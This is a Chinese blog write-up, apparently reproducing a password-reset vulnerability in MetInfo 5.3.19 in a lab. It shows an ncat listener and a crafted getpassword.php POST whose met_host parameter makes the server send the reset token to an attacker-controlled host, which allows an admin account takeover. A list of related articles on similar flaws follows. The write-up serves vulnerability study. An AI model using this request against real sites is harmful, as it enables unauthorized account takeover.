安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php设置为只读。

查看改文件,发现确实是刚修改的。

步骤

先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。

C:\Users\caiqiqi>ncat -lvv 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

在burp中构造如下请求:

POST /admin/admin/getpassword.php?met_host=192.168.96.1 HTTP/1.1
Host: 192.168.96.129
Content-Length: 93
Cache-Control: max-age=0
Origin: http://192.168.96.129
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3580.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.96.129/admin/admin/getpassword.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bdshare_firstime=1537607377172; PHPSESSID=88ff446fa200097801dbc105bd91fb27; page_iframe_url=http://192.168.96.129/index.php?lang=cn&pageset=1; re_url=http%3A%2F%2F192.168.96.129%2Fadmin%2F
Connection: closeaction=next2&abt_type=2&admin_mobile=77caikiki%40gmail.com&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5

然后回返回这样。

然后在宿主机上的ncat可以看到传来的流量:

向我指定的met_host192.168.96.1passwordmail.php发送了POST请求。

其中有一个a标签,里面是重置密码邮件中用于重置密码的url:

http://192.168.96.129/admin/admi
n/getpassword.php?p=3ddePPh60cYObk8%2Bvjaggw%2BaoSYNrzFyO1%2FD7FeDSJ9S0F3PTxziVm
oLko8TrDQ0k0hD%2F65ytaW78BoqDXx2WbM

访问这个链接得到:

即可重置为任意密码。
使用新的密码成功登陆。

参考

https://blog.csdn.net/sinat_28757329/article/details/78868499

metinfo 5.3.19密码重置漏洞相关推荐

  1. XSS漏洞利用---PHPMyWind 任意密码重置漏洞

    [漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...

  2. 墨者学院-登录密码重置漏洞分析溯源

    墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...

  3. TP-Link TL-WR840N v6.20(EU) 密码重置漏洞

    TP-Link TL-WR840N v6.20(EU) 密码重置漏洞 (CVE-2021-46122) #TPLINK.#CVE.#crash.#rce 最后修改时间:2022.04.18. 故事 寒 ...

  4. 记一次任意用户密码重置漏洞(session覆盖)

    首先,注册用户(两个用户),我用我的小号,大号进行注册,过程方便就先省略 接下来两个号分别登录,登录完退出 (强迫症) 然后就去找密码重置的界面了 第一个是被重置的帐户 然后分别发送邮件 注意!:第一 ...

  5. CVE-2017-8295——WordPress未经授权密码重置漏洞

    漏洞提交者:Dawid Golunski 漏洞编号:CVE-2017-8295 发布日期:2017-05-03 修订版本:1.0 漏洞危害:中/高 I. 漏洞 WordPress内核<= 4.7 ...

  6. DeDecms任意用户登录,管理员密码重置漏洞

    基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS- ...

  7. 墨者登录密码重置漏洞分析溯源题解

    给了一个链接,自己的号码是18868345809,题目让重置17101304128的号码,首先我们尝试重置自己的号码看看 能发现是在页面上直接显示的,这给我的第一个想法是直接抓包修改号码然后拿到验证码 ...

  8. 换一种姿势挖掘任意用户密码重置漏洞

    上一篇文章我们提到了利用Unicode规范化来挖洞的思路以及方法,大家反响很热烈 一直在后台给我留言,苦苦哀求 让我憋tm写了,一直写烦不烦呀 现在的读者都已经这么体贴了吗?都已经开始关心我辛苦码字烦 ...

  9. 逻辑漏洞 - 密码重置

    https://bbs.ichunqiu.com/thread-59325-1-1.html 前言 任意用户密码重置漏洞在渗透测试中属于逻辑漏洞的一种,形成的原因是开发者在开发时没有对各项参数进行准确 ...

最新文章

  1. ^l手动换行符 ^p段落标记符 /n/r_/n
  2. LauncherApplication
  3. android art虚拟机安装,Android中art虚拟机启动流程
  4. json字符串转java对象数组
  5. visualvm远程监控jvm_大型企业JVM实战:优化及面试热点分析
  6. 如何用java实现加减_用Java实现不用加减乘除做加法操作
  7. 通用职责分配软件原则之5-控制器原则
  8. python如何合并两个字典
  9. 选择WebSockets还是REST?
  10. DIOCP开源项目-DIOCP3的重生和稳定版本发布
  11. Java设计模式(7)——装饰者模式
  12. 大麦无线虚拟服务器,解答大麦盒子无线设置的问题
  13. mysql添加开机自启_【实操篇】如何设置MySQL开机自启动
  14. 将磁盘分区标记为活动分区后取消
  15. Flask PyMongo的基本使用
  16. 从知名外企到创业公司做CTO是一种怎样的体验?
  17. 遵循亚马逊标准!Kindle 电子书专业制作教程
  18. hive  explode(split(split_feild,‘split_char‘)) split_feild为null 整条数据会丢掉
  19. linux虚拟机a problem has occurred and the system can‘t recover解决方案
  20. 15天入门Python,每天都该干嘛,规划路线。

热门文章

  1. python幂次方计算公式_【python】计算一个数得n次方?
  2. 俄语入门难不难-大舌音难学吗-弹舌难学吗
  3. 搭建asp会议签到系统 第四章 会议统计
  4. Linux启动/停止/重启防火墙
  5. 苹果为App订阅付费添加二次确认 避免意外支付情况
  6. 方舟生存显示都是外国服务器,方舟生存进化:在新服的国人,都是如何跟外国人交流的?...
  7. 用树莓派搜寻地外文明
  8. rOG魔霸新锐2022和魔霸6区别 哪个好
  9. 那些好用的网站推荐(一)----功能网站
  10. 自建dnspod解析服务器,自建DNS解析及Glue Record 自建DNS解析域名